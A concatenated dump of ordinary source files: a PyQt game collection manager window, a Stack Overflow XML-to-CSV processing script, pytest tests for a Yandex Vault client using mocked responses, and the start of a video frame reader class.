768)\n self.center()\n\n self.setWindowTitle(f\"Game Collection Manager v{_VERSION}\")\n self.statusBar().showMessage(\"\")\n\n def about(self):\n aboutMsg = QMessageBox()\n aboutMsg.setIcon(QMessageBox.Information)\n aboutMsg.setWindowTitle(\"About\")\n aboutMsg.setText(\"

Game Collection Manager

\")\n aboutMsg.setInformativeText(f\"Version {_VERSION}\\n\")\n aboutMsg.exec_()\n self.search()\n\n def addToCollection(self):\n \"\"\"\n Adds data to the collection using InputWindow\n \"\"\"\n\n # Loop until user enters valid data\n while True:\n self.addWindow = InputWindow(self.allPlatforms)\n if self.addWindow.exec_() == QDialog.Accepted:\n data = self.addWindow.returnData()\n\n if data['platform'].isspace() or data['name'] == \"\":\n msgBox = QMessageBox()\n msgBox.setIcon(QMessageBox.Information)\n msgBox.setWindowTitle(\"Invalid entry\")\n msgBox.setText(\"Platform and name cannot be empty\")\n msgBox.exec_()\n continue\n\n # Update Platform, Region, Genre, and Year in filter dock if necessary\n if data[\"platform\"] not in self.allPlatforms:\n self.allPlatforms.add(data[\"platform\"])\n self.filterDock.updatePlatforms(sorted(self.allPlatforms, key=str.lower))\n if data[\"region\"] not in self.allRegions:\n self.allRegions.add(data[\"region\"])\n self.filterDock.updateRegions(sorted(self.allRegions, key=str.lower))\n if data[\"genre\"] not in self.allGenres:\n self.allGenres.add(data[\"genre\"])\n self.filterDock.updateGenres(sorted(self.allGenres, key=str.lower))\n if data[\"year\"] not in self.allYears:\n self.allYears.add(data[\"year\"])\n self.filterDock.updateYears(sorted(self.allYears, key=str.lower))\n\n if \"game\" in data.keys():\n self.gamesTableView.addData(data)\n self.overview.updateData(self.gamesTableView)\n self.randomizer.updateLists(self.gamesTableView.ownedItems(),\n sorted(self.allPlatforms, key=str.lower),\n sorted(self.allGenres, key=str.lower))\n elif \"console\" in data.keys():\n self.consolesTableView.addData(data)\n self.overview.updateData(self.consolesTableView)\n elif \"accessory\" in data.keys():\n self.accessoriesTableView.addData(data)\n self.overview.updateData(self.accessoriesTableView)\n self.search()\n else:\n break\n\n def deleteFromCollection(self):\n currentTab = self.tab.currentIndex()\n\n if 0 < currentTab < 4:\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Delete items\")\n msgBox.setText(\"Are you sure?\")\n msgBox.setIcon(QMessageBox.Warning)\n msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n msgBox.setDefaultButton(QMessageBox.Cancel)\n ok = msgBox.exec_()\n\n if ok == QMessageBox.Ok:\n rows = []\n indexes = self.tableViewList[currentTab-1].selectedIndexes()\n for index in indexes:\n rows.append(index.row())\n self.tableViewList[currentTab-1].deleteData(rows)\n self.overview.updateData(self.tableViewList[currentTab-1])\n if currentTab == 1:\n self.randomizer.updateLists(self.gamesTableView.ownedItems(),\n sorted(self.allPlatforms, key=str.lower),\n sorted(self.allGenres, key=str.lower))\n self.search()\n\n def deleteNotOwned(self):\n \"\"\"\n Deletes items in table that are not owned. Not owned items are items that\n don't have either the item itself, the box, or the manual.\n \"\"\"\n currentTab = self.tab.currentIndex()\n\n if 0 < currentTab < 4:\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Remove not owned items\")\n msgBox.setText(\"Are you sure?\")\n msgBox.setIcon(QMessageBox.Warning)\n msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n msgBox.setDefaultButton(QMessageBox.Cancel)\n ok = msgBox.exec_()\n\n if ok == QMessageBox.Ok:\n self.tableViewList[currentTab-1].deleteNotOwned()\n self.search()\n\n def fetchInfo(self):\n \"\"\"\n Fetches info for all games from MobyGames. Sleeps for 5 seconds\n between game so we don't annoy their servers.\n :return:\n \"\"\"\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Fetch info for all games\")\n msgBox.setText(\"This will take a long time. Are you sure?\")\n msgBox.setIcon(QMessageBox.Warning)\n msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n msgBox.setDefaultButton(QMessageBox.Cancel)\n ok = msgBox.exec_()\n\n if ok == QMessageBox.Ok:\n games = self.gamesTableView.ownedItems()\n for game in games:\n info = getMobyRelease(game[\"name\"], game[\"platform\"], game[\"region\"])\n price = getPriceData(game[\"name\"], game[\"platform\"], game[\"region\"])\n paidPrice = game[\"price\"].split(\",\")[0]\n info[\"price\"] = \",\".join((paidPrice, price[\"loose\"], price[\"cib\"], price[\"new\"]))\n info[\"id\"] = game[\"id\"]\n self.gamesTableView.updateData(info)\n\n if \"image\" in info.keys() and info[\"image\"] != \"\":\n coverDir = path.join(\"data\", \"images\", \"covers\")\n id = str(game[\"id\"]) + \".jpg\"\n imageData = requests.get(info[\"image\"]).content\n\n if not path.exists(path.join(coverDir, id)):\n with open(path.join(coverDir, id), \"wb\") as f:\n f.write(imageData)\n\n sleep(5) # Be nice\n\n def importToDatabase(self):\n \"\"\"\n Imports all games from selected platforms into database as not owned.\n This is to make it easier for the user to quickly go through the games\n in a platform and check which games they own.\n \"\"\"\n self.importWindow = ImportWindow()\n if self.importWindow.exec_() == QDialog.Accepted:\n data, platforms, regions = self.importWindow.returnData()\n self.statusProgressBar.setVisible(True)\n self.gamesTableView.addData(data)\n self.statusProgressBar.setVisible(False)\n\n for platform in platforms:\n if platform not in self.allPlatforms:\n self.allPlatforms.add(platform)\n self.filterDock.updatePlatforms(sorted(self.allPlatforms, key=str.lower))\n for region in regions:\n if region not in self.allRegions:\n self.allRegions.add(region)\n self.filterDock.updateRegions(sorted(self.allRegions, key=str.lower))\n self.search()\n\n def importSteamLibrary(self):\n apiKey, ok = QInputDialog.getText(self, \"Import Steam Library\", \"Enter Steam API Key:\")\n if ok and not (apiKey.isspace() or apiKey == \"\"):\n steamID, ok = QInputDialog.getText(self, \"Import Steam Library\", \"Enter Steam User ID:\")\n if ok and not (steamID.isspace() or steamID == \"\"):\n try:\n games = getSteamLibrary(apiKey, steamID)\n except (PermissionError, ValueError) as e:\n msgBox = QMessageBox(QMessageBox.Critical, \"Error\", \"An error occured.\")\n msgBox.setInformativeText(str(e))\n msgBox.exec_()\n else:\n if \"Steam\" not in self.allPlatforms:\n self.allPlatforms.add(\"Steam\")\n self.allRegions.add(\"Steam\")\n self.filterDock.updatePlatforms(sorted(self.allPlatforms, key=str.lower))\n self.filterDock.updateRegions(sorted(self.allRegions, key=str.lower))\n self.gamesTableView.addData(games)\n else: # Only add games not already in collection\n existingGames = []\n query = QSqlQuery()\n query.exec_(\"SELECT Name from games WHERE Region='Steam'\")\n while query.next():\n existingGames.append(query.value(0))\n\n for game in games:\n if game[\"name\"] not in existingGames:\n self.gamesTableView.addData(game)\n self.overview.updateData(self.gamesTableView)\n self.randomizer.updateLists(self.gamesTableView.ownedItems(),\n sorted(self.allPlatforms, key=str.lower),\n sorted(self.allGenres, key=str.lower))\n self.search()\n\n def exportToCSV(self):\n def doexport():\n filetype = filetypes.currentText()\n exportTables = []\n db = self.consolesTableView.model.database()\n if tablesBox.currentIndex() == 0:\n for table in tables[1:]:\n exportTables.append(table.lower())\n elif tablesBox.currentIndex() == 1:\n exportTables.append(\"games\")\n elif tablesBox.currentIndex() == 2:\n exportTables.append(\"consoles\")\n elif tablesBox.currentIndex() == 3:\n exportTables.append(\"accessories\")\n\n sql2csv(db, exportTables, filetype)\n exportWindow.close()\n\n exportWindow = QDialog()\n\n tables = [\"All\", \"Games\", \"Consoles\", \"Accessories\"]\n tablesLabel = QLabel(\"Tables to export\")\n tablesBox = QComboBox()\n # tablesBox.addItem(None, text=\"All\")\n tablesBox.addItems(tables)\n tablesLayout = QHBoxLayout()\n tablesLayout.addWidget(tablesLabel)\n tablesLayout.addWidget(tablesBox)\n\n filetypesLabel = QLabel(\"Filetype\")\n filetypes = QComboBox()\n filetypes.addItems([\"csv\", \"tsv\"])\n filetypesLayout = QHBoxLayout()\n filetypesLayout.addWidget(filetypesLabel)\n filetypesLayout.addWidget(filetypes)\n\n # filenameLabel = QLabel(\"Filename\")\n # filename = QLineEdit()\n # filesLayout = QHBoxLayout()\n # filesLayout.addWidget(filenameLabel)\n # filesLayout.addWidget(filename)\n\n ok = QPushButton(\"Ok\")\n ok.clicked.connect(doexport)\n cancel = QPushButton(\"Cancel\")\n cancel.clicked.connect(exportWindow.close)\n buttonLayout = QHBoxLayout()\n buttonLayout.addWidget(ok)\n buttonLayout.addWidget(cancel)\n\n layout = QVBoxLayout()\n layout.addLayout(tablesLayout)\n # layout.addLayout(filesLayout)\n layout.addLayout(filetypesLayout)\n layout.addLayout(buttonLayout)\n\n exportWindow.setLayout(layout)\n exportWindow.exec_()\n\n # noinspection PyCallByClass,PyTypeChecker\n def buttonActions(self, action: str) -> QAction:\n addAct = QAction(QIcon().fromTheme(\"list-add\"), \"&Add to collection...\", self)\n addAct.setShortcut(\"Ctrl+A\")\n addAct.setToolTip(\"Add to collection\")\n addAct.triggered.connect(self.addToCollection)\n\n delText = \"&Delete row\"\n currentTab = self.tab.currentIndex()\n if 0 < currentTab < 4:\n if len(self.tableViewList[currentTab-1].selectedIndexes()) > 1:\n delText += \"s\"\n delAct = QAction(QIcon().fromTheme(\"edit-delete\"), delText, self)\n delAct.setToolTip(\"Delete from collection\")\n delAct.triggered.connect(self.deleteFromCollection)\n\n detAct = QAction(QIcon.fromTheme(\"text-x-generic-template\"), \"Details...\", self)\n detAct.setToolTip(\"Open details side-panel\")\n detAct.triggered.connect(self.tableViewList[currentTab-1].rowData)\n\n expAct = QAction(QIcon.fromTheme(\"text-x-generic-template\"), \"&Export as csv...\", self)\n expAct.setShortcut(\"Ctrl+E\")\n expAct.setToolTip(\"Export table as CSV file\")\n expAct.triggered.connect(self.exportToCSV)\n\n impAct = QAction(QIcon.fromTheme(\"insert-object\"), \"&Import platform template...\", self)\n impAct.setShortcut(\"Ctrl+I\")\n impAct.setToolTip(\"Import games to database\")\n impAct.triggered.connect(self.importToDatabase)\n\n stmAct = QAction(QIcon.fromTheme(\"insert-object\"), \"Import Steam Library...\", self)\n stmAct.triggered.connect(self.importSteamLibrary)\n\n ownAct = QAction(\"Hide games not in collection\", self)\n ownAct.setCheckable(True)\n ownAct.setChecked(True)\n ownAct.triggered.connect(self.toggleOwnedFilter)\n\n delNotOwned = QAction(QIcon().fromTheme(\"edit-delete\"), \"Remove items not in collection\", self)\n delNotOwned.setToolTip(\"Remove items that are not owned from database\")\n delNotOwned.triggered.connect(self.deleteNotOwned)\n\n aboutAct = QAction(QIcon.fromTheme(\"help-about\"), \"Abou&t\", self)\n aboutAct.setToolTip(\"About Game Collection Manager\")\n aboutAct.triggered.connect(self.about)\n\n exitAct = QAction(QIcon.fromTheme(\"application-exit\"), \"&Exit\", self)\n exitAct.setShortcut(\"Ctrl+Q\")\n exitAct.setToolTip(\"Exit application\")\n exitAct.triggered.connect(self.close)\n\n infoAct = QAction(\"Debug: Print row info\", self)\n infoAct.triggered.connect(self.info)\n\n fetchAct = QAction(\"Fetch info for all games...\", self)\n fetchAct.setToolTip(\"Tries to fetch info for all games from MobyGames\")\n fetchAct.triggered.connect(self.fetchInfo)\n\n valAct = QAction(\"Total value of collection\", self)\n valAct.setToolTip(\"Rough estimate of the total value of collection\")\n valAct.triggered.connect(self.totalValue)\n\n act = {\"add\": addAct, \"del\": delAct, \"det\": detAct, \"export\": expAct,\n \"import\": impAct, \"steam\": stmAct, \"owned\": ownAct,\n \"delnotowned\": delNotOwned, \"about\": aboutAct, \"exit\": exitAct,\n \"info\": infoAct, \"fetch\": fetchAct, \"value\": valAct}\n\n return act.get(action)\n\n def center(self):\n \"\"\"Centers window on screen\"\"\"\n\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n def contextMenuEvent(self, event):\n \"\"\"Re-implements context menu functionality for our needs.\"\"\"\n cmenu = QMenu(self)\n\n currentTab = self.tab.currentIndex()\n\n if 0 < currentTab < 4:\n cmenu.addAction(self.buttonActions(\"det\"))\n cmenu.addAction(self.buttonActions(\"del\"))\n cmenu.addAction(self.buttonActions(\"info\"))\n cmenu.exec_(self.mapToGlobal(event.pos()))\n\n self.search()\n\n def info(self):\n currentTab = self.tab.currentIndex()\n indexes = self.tableViewList[currentTab-1].selectedIndexes()\n rows = [index.row() for index in indexes]\n for _ in rows:\n self.tableViewList[currentTab-1].rowInfo()\n\n def search(self):\n \"\"\"Filters table contents based on user input\"\"\"\n\n currentTab = self.tab.currentIndex()\n\n if 0 < currentTab < 4:\n searchText = self.searchBox.text()\n self.searchLabel.setVisible(True)\n self.searchBox.setVisible(True)\n self.filterBtn.setVisible(True)\n self.searchBtn.setVisible(True)\n self.filterDock.setItemType(currentTab)\n itemCount = self.tableViewList[currentTab - 1].filterTable(searchText, self.filterDock.getSelections())\n\n if searchText != \"\" or len(self.filterDock.getSelections()) > 0:\n self.statusBar().showMessage(\"Found {} {}.\".format(itemCount,\n self.tableViewList[currentTab-1].model.tableName()))\n else:\n self.updateStatusbar()\n else:\n self.searchLabel.setVisible(False)\n self.searchBox.setVisible(False)\n self.filterBtn.setVisible(False)\n self.searchBtn.setVisible(False)\n if self.filterDock.isVisible():\n self.filterDock.toggleVisibility()\n\n def toggleOwnedFilter(self):\n for table in self.tableViewList:\n table.setHideNotOwned(False) if table.hideNotOwned\\\n else table.setHideNotOwned(True)\n currentTab = self.tab.currentIndex()\n if 0 < currentTab < 4:\n self.tableViewList[currentTab-1].filterTable(self.searchBox.text(), self.filterDock.getSelections())\n self.search()\n\n def totalValue(self):\n value = 0.0\n items = []\n for table in self.tableViewList:\n items.extend(table.ownedItems())\n\n for item in items:\n if item[\"item\"] == \"Yes\" and item[\"box\"] == \"Yes\" and item[\"manual\"] == \"Yes\":\n price = item[\"price\"].split(\",\")[2]\n else:\n price = item[\"price\"].split(\",\")[1]\n\n if price == \"N/A\":\n value += 0\n continue\n value += float(price.lstrip(\"$\"))\n\n displayMsgBox(\"Collection value\", \"Rough estimate of collection's value.\",\n f\"

${str(value)}

\", \"information\")\n\n def updateStatusbar(self):\n currentTab = self.tab.currentIndex()\n itemType = [\"games\", \"consoles\", \"accessories\"]\n\n if currentTab == 0:\n self.statusBar().showMessage(\"\")\n elif 0 < currentTab < 4:\n numItems = self.tableViewList[currentTab-1].ownedCount\n if self.tableViewList[currentTab-1].hideNotOwned:\n self.statusBar().showMessage(f\"{numItems} {itemType[currentTab-1]} in collection.\")\n else:\n self.statusBar().showMessage(\"Showing {} {} ({} {} in collection).\".format(\n self.tableViewList[currentTab-1].allCount,\n itemType[currentTab-1],\n numItems,\n itemType[currentTab-1]))\n elif currentTab == 4:\n platforms = self.randomizer.consoleList.selectedItems()\n genres = self.randomizer.genreList.selectedItems()\n self.statusBar().showMessage(\"Select platforms or genre to randomize from.\")\n if len(platforms) > 0 or len(genres) > 0:\n self.statusBar().showMessage(f\"Selecting from {self.randomizer.gameCount()} games.\")\n return\n\n\ndef displayMsgBox(title: str, message: str, info: str, messageType: str):\n icons = {\"warning\": QMessageBox.Warning,\n \"critical\": QMessageBox.Critical,\n \"question\": QMessageBox.Question,\n \"information\": QMessageBox.Information}\n\n msgBox = QMessageBox()\n msgBox.setWindowTitle(title)\n msgBox.setText(message)\n msgBox.setInformativeText(info)\n msgBox.setIcon(icons[messageType])\n if messageType == \"question\":\n msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n msgBox.setDefaultButton(QMessageBox.Cancel)\n\n return msgBox.exec_()\n","repo_name":"rsvensson/GameCollectionManager","sub_path":"GameCollectionManager/widgets/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":27760,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"5977707811","text":"from lxml import etree\nfrom datetime import datetime\nimport csv\nimport logging\nimport argparse\nfrom util import tags_huge, keyword_list, cols_base, wrap_tags\nfrom pathlib import Path\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-p\", \"--progressindicatorvalue\",\n help=\"Shows nr of rows imported for larger files\", type=int, default=10000000)\nargs = parser.parse_args()\n\n\ninputdir = \"/home/amirrezaesmaeili/Downloads/Persepolis/Compressed/data/Stackoverflow.com-Posts/Posts.xml\"\noutputdir = \"./data/intermediary/\" + \\\n datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\")\nPath(outputdir).mkdir(parents=True, exist_ok=True)\n\ncols = cols_base\n\ndeprecate_keywords = keyword_list\n\ntarget_tags = wrap_tags(tags_huge)\n\ntotal_rows = 57721548\nprocess_row_limit = 5000000000000\ncreate_row_limit = 5000000000000\n# process_row_limit = 50000\n# create_row_limit = 500\nskip_title_body_check = False\n\n\ndef clean_data(column, type):\n _column = column\n if str(column) == \"False\":\n _column = 0\n elif str(column) == \"True\":\n _column = 1\n\n if type == \"CreationDate\" or type == \"LastActivityDate\" or type == \"LastEditDate\" or type == \"LastAccessDate\":\n _column = datetime.strptime(\n _column, \"%Y-%m-%dT%H:%M:%S.%f\").strftime(\"%Y-%m-%d %H:%M:%S\")\n return _column\n\n\nquestion_cache = {}\n\n\ndef process_row(mode, id, parent_id, post_type_id, tags, body, title):\n if post_type_id == '1':\n postType = 'Q'\n elif post_type_id == '2':\n postType = 'A'\n else:\n postType = 'U'\n\n if postType == 'U':\n return False\n if mode == 'scan' and postType == 'A':\n return False\n\n if postType == 'Q':\n tagsOk = False\n for tag in target_tags:\n if tag in tags:\n tagsOk = True\n break\n if not tagsOk:\n return False\n\n if mode == 'scan':\n question_cache[id] = []\n\n if postType == 'A':\n bodyOk = skip_title_body_check or False\n if not skip_title_body_check:\n for keyword in deprecate_keywords:\n if keyword in body:\n bodyOk = True\n break\n if not bodyOk:\n return False\n\n if parent_id in question_cache:\n question_cache[parent_id].append(id)\n else:\n return False\n\n return True\n\n\ndef parse_xml(sourcefilename, destinationfilename, columns, mode):\n context = etree.iterparse(sourcefilename, events=('end',), tag='row')\n if mode == 'write':\n f = open(destinationfilename, 'w', newline='', encoding=\"utf-8\")\n w = csv.writer(f, quoting=csv.QUOTE_ALL)\n processed_rows = 0\n created_rows = 0\n q_created_rows = 0\n a_created_rows = 0\n u_created_rows = 0\n if mode == 'write':\n w.writerow(columns)\n last_iter_time = datetime.now()\n for event, element in context:\n if (processed_rows % args.progressindicatorvalue == 0):\n elapsed_time = datetime.now() - last_iter_time\n last_iter_time = datetime.now()\n estimated_time = elapsed_time * \\\n ((total_rows - processed_rows) / args.progressindicatorvalue)\n logging.info(\" MODE: %s,Processed %s rows, created %s rows. elapsed: %s ETA: %s, done: %s%%\",\n mode, processed_rows, created_rows, elapsed_time, estimated_time, (processed_rows / total_rows) * 100)\n if processed_rows > process_row_limit or created_rows > create_row_limit:\n break\n\n processed_rows += 1\n post_type_id = element.attrib[\"PostTypeId\"]\n title = (element.attrib[\"Title\"]\n if \"Title\" in element.attrib else '').strip().lower()\n body = (element.attrib[\"Body\"]\n if \"Body\" in element.attrib else '').strip().lower()\n tags = (element.attrib[\"Tags\"]\n if \"Tags\" in element.attrib else '').strip().lower()\n id = (element.attrib[\"Id\"]\n if \"Id\" in element.attrib else '').strip().lower()\n parent_id = (element.attrib[\"ParentId\"]\n if \"ParentId\" in element.attrib else '').strip().lower()\n if process_row(mode, id, parent_id, post_type_id, tags, body, title):\n if mode == 'write':\n row = [clean_data(\n element.attrib[column], column) if column in element.attrib else '' for column in columns]\n w.writerow(row)\n created_rows += 1\n if post_type_id == '1':\n q_created_rows += 1\n elif post_type_id == '2':\n a_created_rows += 1\n else:\n u_created_rows += 1\n\n while element.getprevious() is not None:\n del element.getparent()[0]\n else:\n while element.getprevious() is not None:\n del element.getparent()[0]\n\n if mode == 'write':\n f.close()\n return processed_rows, created_rows, q_created_rows, a_created_rows, u_created_rows\n\n\nformat = \"%(asctime)s: %(message)s\"\nlogging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\nlogging.info(\"Starting processing\")\n\nstart_time = datetime.now()\nprocessed_rows, created_rows, q, a, u = parse_xml(\n inputdir, outputdir + \"/posts.csv\", cols, 'scan')\nelapsed_time = datetime.now() - start_time\n\nlogging.info(\"SCAN: Finished processing, processed %s rows, created %s rows in %s\",\n processed_rows, created_rows, elapsed_time)\n\nstart_time = datetime.now()\nprocessed_rows, created_rows, q_created_rows, a_created_rows, u_created_rows = parse_xml(\n inputdir, outputdir + \"/posts.csv\", cols, 'write')\nelapsed_time = datetime.now() - start_time\n\nlogging.info(\"WRITE: Finished processing, processed %s rows, created %s Q rows and %s A rows, Total: %s, in %s\",\n processed_rows, q_created_rows, a_created_rows, created_rows, elapsed_time)\n\nf = open(outputdir + \"/relations.csv\", 'w', newline='', encoding=\"utf-8\")\nw = csv.writer(f, quoting=csv.QUOTE_ALL)\nw.writerow(['QuestionId', 'AnswerId'])\nprocessed_rels = 0\ncreated_rels = 0\ncreated_rels_a = 0\nfor key, value in question_cache.items():\n processed_rels += 1\n if len(value) > 0:\n created_rels += 1\n ids = []\n for v in value:\n created_rels_a += 1\n ids.append(v)\n w.writerow([key, '-'.join(ids)])\n\n\nlogging.info(\"RELATIONS: Finished processing, processed %s rows, created %s, containing %s answers\",\n processed_rels, created_rels, created_rels_a)\n\nprint(sum([len(x) for x in question_cache.values()]))\n","repo_name":"Amirresm/SO-obso-data-collection","sub_path":"process_data_dump.py","file_name":"process_data_dump.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29256021007","text":"from datetime import datetime, timezone\n\nimport pytest\nfrom aiohttp.web import json_response\n\nfrom maps_adv.common.aioyav import AccessError, InvalidOAuthToken, InvalidUUID\n\npytestmark = [pytest.mark.asyncio]\n\n\n@pytest.fixture\ndef mock_versions(rmock):\n return lambda secret_uuid, *a: rmock(f\"/1/versions/{secret_uuid}/\", \"GET\", *a)\n\n\nasync def test_sends_correct_request(mock_versions, yav):\n request_path = None\n request_headers = None\n\n async def _handler(request):\n nonlocal request_path, request_headers\n request_path = request.path\n request_headers = request.headers\n return json_response(data=success_response, status=200)\n\n mock_versions(\"sec-01e6zwtfg5g4b727yq4w3qvnz3\", _handler)\n\n await yav.retrieve_secret_head(\"sec-01e6zwtfg5g4b727yq4w3qvnz3\")\n\n assert request_path == \"/1/versions/sec-01e6zwtfg5g4b727yq4w3qvnz3/\"\n assert request_headers.get(\"Authorization\") == \"OAuth oauth_token\"\n\n\nasync def test_returns_secret_details(mock_versions, yav):\n mock_versions(\n \"sec-01e6zwtfg5g4b727yq4w3qvnz3\",\n json_response(data=success_response, status=200),\n )\n\n got = await yav.retrieve_secret_head(\"sec-01e6zwtfg5g4b727yq4w3qvnz3\")\n\n assert got == {\n \"comment\": \"\",\n \"created_at\": datetime(2020, 4, 28, 8, 0, 31, 246000, tzinfo=timezone.utc),\n \"created_by\": 1120000000098712,\n \"creator_login\": \"sivakov512\",\n \"secret_name\": \"aioyav-example\",\n \"secret_uuid\": \"sec-01e6zwtfg5g4b727yq4w3qvnz3\",\n \"value\": {\"key_one\": \"some value\", \"100\": \"500\", \"key-two\": \"another\\nvalue\"},\n \"version\": \"ver-01e6zwtfgen5w925z9qztr9hcv\",\n }\n\n\nasync def test_raises_for_access_error(mock_versions, yav):\n mock_versions(\n \"sec-01e6zwtfg5g4b727yq4w3qvnz4\",\n json_response(\n data={\n \"api_request_id\": \"1f5f212bd9603059226f0dfeb72407e9\",\n \"code\": \"access_error\",\n \"environment\": \"production\",\n \"hostname\": \"vault-v4.passport.yandex.net\",\n \"message\": \"Access denied\",\n \"status\": \"error\",\n },\n status=401,\n ),\n )\n\n with pytest.raises(AccessError) as exc_info:\n await yav.retrieve_secret_head(\"sec-01e6zwtfg5g4b727yq4w3qvnz4\")\n\n assert exc_info.value.args[0] == {\n \"api_request_id\": \"1f5f212bd9603059226f0dfeb72407e9\",\n \"code\": \"access_error\",\n \"environment\": \"production\",\n \"hostname\": \"vault-v4.passport.yandex.net\",\n \"message\": \"Access denied\",\n \"status\": \"error\",\n }\n\n\nasync def test_raises_for_invalid_uuid(mock_versions, yav):\n mock_versions(\n \"sec-01e6zwtfg5g4b727yq4w3qvnz\",\n json_response(\n data={\n \"api_request_id\": \"f77daa307409ea959de04a9b3ef806e3\",\n \"code\": \"invalid_uuid_value\",\n \"environment\": \"production\",\n \"hostname\": \"vault-v2.passport.yandex.net\",\n \"message\": \"u'01e6zwtfg5g4b727yq4w3qvnz' is an invalid UUID value\",\n \"status\": \"error\",\n },\n status=400,\n ),\n )\n\n with pytest.raises(InvalidUUID) as exc_info:\n await yav.retrieve_secret_head(\"sec-01e6zwtfg5g4b727yq4w3qvnz\")\n\n assert exc_info.value.args[0] == {\n \"api_request_id\": \"f77daa307409ea959de04a9b3ef806e3\",\n \"code\": \"invalid_uuid_value\",\n \"environment\": \"production\",\n \"hostname\": \"vault-v2.passport.yandex.net\",\n \"message\": \"u'01e6zwtfg5g4b727yq4w3qvnz' is an invalid UUID value\",\n \"status\": \"error\",\n }\n\n\nasync def test_raises_for_invalid_oauth_token(mock_versions, make_yav):\n yav = await make_yav(\"wrong_token\")\n mock_versions(\n \"sec-01e6zwtfg5g4b727yq4w3qvnz3\",\n json_response(\n data={\n \"api_request_id\": \"5207955f647d8beaf63ee3180b9fdee8\",\n \"blackbox_error\": \"expired_token\",\n \"code\": \"invalid_oauth_token_error\",\n \"environment\": \"production\",\n \"hostname\": \"vault-s5.passport.yandex.net\",\n \"message\": \"Invalid oauth token\",\n \"status\": \"error\",\n },\n status=401,\n ),\n )\n\n with pytest.raises(InvalidOAuthToken) as exc_info:\n await yav.retrieve_secret_head(\"sec-01e6zwtfg5g4b727yq4w3qvnz3\")\n\n assert exc_info.value.args[0] == {\n \"api_request_id\": \"5207955f647d8beaf63ee3180b9fdee8\",\n \"blackbox_error\": \"expired_token\",\n \"code\": \"invalid_oauth_token_error\",\n \"environment\": \"production\",\n \"hostname\": \"vault-s5.passport.yandex.net\",\n \"message\": \"Invalid oauth token\",\n \"status\": \"error\",\n }\n\n\nsuccess_response = {\n \"status\": \"ok\",\n \"version\": {\n \"comment\": \"\",\n \"created_at\": 1588060831.246,\n \"created_by\": 1120000000098712,\n \"creator_login\": \"sivakov512\",\n \"secret_name\": \"aioyav-example\",\n \"secret_uuid\": \"sec-01e6zwtfg5g4b727yq4w3qvnz3\",\n \"value\": [\n {\"key\": \"key_one\", \"value\": \"some value\"},\n {\"key\": \"100\", \"value\": \"500\"},\n {\"key\": \"key-two\", \"value\": \"another\\nvalue\"},\n ],\n \"version\": \"ver-01e6zwtfgen5w925z9qztr9hcv\",\n },\n}\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/test_retrieve_secret_head.py","file_name":"test_retrieve_secret_head.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19445001984","text":"\"\"\"\n Contains functionality for video frame I/O.\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport cv2\nimport h5py\n\n\nclass FrameReader:\n \"\"\"Base class for reading frames from a video source.\"\"\"\n\n def __init__(self):\n self.fps = 0\n self.start_frame = 0\n self.end_frame = 0\n self.total_frames = 0\n self.next_frame_number = 0\n\n self.frame_shape = (0, 0, 0)\n self.last_read_frame = None\n self.frames_read = 0\n self.read_errors = 0\n\n def __init_subclass__(cls, **kwargs):\n super().__init_subclass__(**kwargs)\n\n if not hasattr(cls, \"read_frame\"):\n raise NotImplementedError(\"Derived FrameReader must implement \"\n \"read_frame() method.\")\n\n def get_frame(self, frame_number=None):\n \"\"\"Returns frame, frame_number, and timestamp while also\n handling read errors.\"\"\"\n\n if frame_number is None:\n frame_number = self.next_frame_number\n\n if not self.start_frame <= frame_number <= self.end_frame:\n # Dummy values for if invalid frame is requested\n frame = np.zeros(self.frame_shape).astype(np.uint8)\n frame_number = -1\n timestamp = \"00:00:00.000\"\n\n else:\n # Subclass must implement this method\n frame = self.read_frame(frame_number)\n timestamp = self.frame_number_to_timestamp(frame_number)\n\n if frame is None:\n frame = self.last_read_frame\n self.read_errors += 1\n else:\n self.frame_shape = frame.shape\n self.last_read_frame = frame\n self.frames_read += 1\n\n return frame, frame_number, timestamp\n\n def get_n_frames(self, n):\n \"\"\"Calls get_frame in batches of N, returning as lists.\"\"\"\n\n frames, frame_numbers, timestamps = [], [], []\n for _ in range(n):\n frame, frame_number, timestamp = self.get_frame()\n\n frames.append(frame)\n frame_numbers.append(frame_number)\n timestamps.append(timestamp)\n\n return frames, frame_numbers, timestamps\n\n def frame_number_to_timestamp(self, frame_number):\n \"\"\"Simple conversion to get timestamp from frame number.\n Dependent on constant FPS assumption for source video file.\"\"\"\n\n total_s = frame_number / self.fps\n timestamp = pd.Timestamp(\"00:00:00.000\") + pd.Timedelta(total_s, 's')\n timestamp = timestamp.round(freq='us')\n\n return timestamp\n\n\nclass HDF5Reader(FrameReader):\n \"\"\"Subclass using HDF5 data container as frame source.\"\"\"\n\n def __init__(self, filepath, start=0, end=0):\n super().__init__()\n\n # Set file object using filepath for reading frames\n self.filepath = filepath\n self.hdf5_file = h5py.File(str(filepath), \"r\")\n self.dset = self.hdf5_file[\"VideoFrames\"]\n\n # Attempt to read attributes from HDF5 group or dataset\n if len(self.hdf5_file.attrs) > 0:\n attrs = self.hdf5_file.attrs\n elif len(self.dset.attrs) > 0:\n attrs = self.dset.attrs\n else:\n raise RuntimeError(\"Passed HDF5 dataset does not contain attrs.\")\n\n self.fps = attrs.get(\"CAP_PROP_FPS\")\n\n # Set start/end frame numbers, or default if not properly passed\n self.start_frame = start\n if end > 0:\n self.end_frame = end\n else:\n 